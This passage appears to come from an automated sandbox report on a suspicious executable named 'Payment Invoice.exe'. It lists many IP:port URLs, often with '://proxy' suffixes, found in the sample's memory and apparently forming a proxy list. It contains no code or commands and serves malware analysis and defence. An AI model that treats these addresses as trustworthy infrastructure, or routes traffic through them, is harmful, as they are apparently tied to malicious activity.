                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:3230
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:3230://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:45883
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:45883://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:53777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:53777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:5484
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:5484://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:56225
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:56225://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.193.186
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.193.186://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.193.186:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.220.52
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.220.52://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.220.52:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.236.203://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.236.203:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.236.203x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.35.152
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.35.152://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.24.35.152:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BEE000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.247.163.246:3825
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.247.163.246:3825://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.146.99:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.151.220:63648
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.151.220:636480q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.151.220:63648://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.151.220:63997://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.158.78:62952
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.158.78:62952://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.59.38
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.59.38://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.248.59.38:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.135.170
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.135.170://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.135.170:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.167.88
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.167.88://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.167.88:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.194.175
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.194.175://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.194.175:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.244.70
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.244.70://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.244.70:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.42.178
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.42.178://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.42.178:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.58.39
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.58.39://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.58.39:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.64.27
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.64.27://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.64.27:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.81.82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.81.82://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.81.82:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.87.42
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.87.42://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.25.87.42:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.255.170.89:51676
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.255.170.89:51676://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.15.161
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.15.161://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.15.161:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.26.29
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.26.29://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.26.29:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.37.131
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.37.131://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.37.131:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.66.31
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.66.31://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.66.31:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.8.161
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.8.161://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.8.161:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.83.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.83.183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.27.83.183:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A40000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.36.166.34:47935
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.36.166.34:47935://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.36.166.34:50260
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.36.166.34:50260://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.112.140.218:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.174.40.54:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.174.40.54:8080://proxy0q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.214.65.244:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.214.65.244:5678://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.234.156.109:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://105.234.156.109:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.218.244
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.218.244://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.105.218.244:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.110.140.87:2080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.110.140.87:2080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.14.255.124
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.14.255.124://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.14.255.124:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.45.221.168:3256
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://106.45.221.168:3256://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.155.65.11:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.155.65.11:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.0.177:666
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.0.177:666://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.255.183:1234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.173.255.183:1234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.178.9.186:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.178.9.186:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.103.214:61634
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.103.214:61634://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:35774
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:35774://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:36503
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:36503://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:44568
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:44568://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:59820
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.173:59820://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:24834
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:24834://proxyxDm
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:57642
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:57642://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:58037
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:58037://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:62578
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.88.41:62578://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:20309
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:20309://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:64081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.90.88:64081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:63951
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:63951://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:64731
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:64731://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.180.95.177:7128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.161.81:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.161.81:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.116
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.116:30770
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.116:30770://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.117:34560
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.132.117:34560://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.104.187.212:41890
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.104.187.212:41890://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.111.212.78:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.111.212.78:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.175.9.203:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.175.9.203:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.194.22.61:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.194.22.61:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.195.23.223:34031
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.195.23.223:34031://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.199.109.144:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.201.233.219:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.201.233.219:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:1365
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:1365://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.70.206.42:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.70.206.42:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.73.184.94:23500
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.73.184.94:23500://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.75.34.152:59341
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.75.34.152:59341://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.86.220.12:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.86.220.12:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.94.182.128:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.94.182.128:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.164.175.110:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.164.175.110:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.185.105.210:51800
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.185.105.210:51800://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163196C4000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163196D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.73.11.181:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163196C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.73.11.181:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.74.195.2:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.74.195.2:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163173AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.159.12:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.159.12:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.232.172:4145
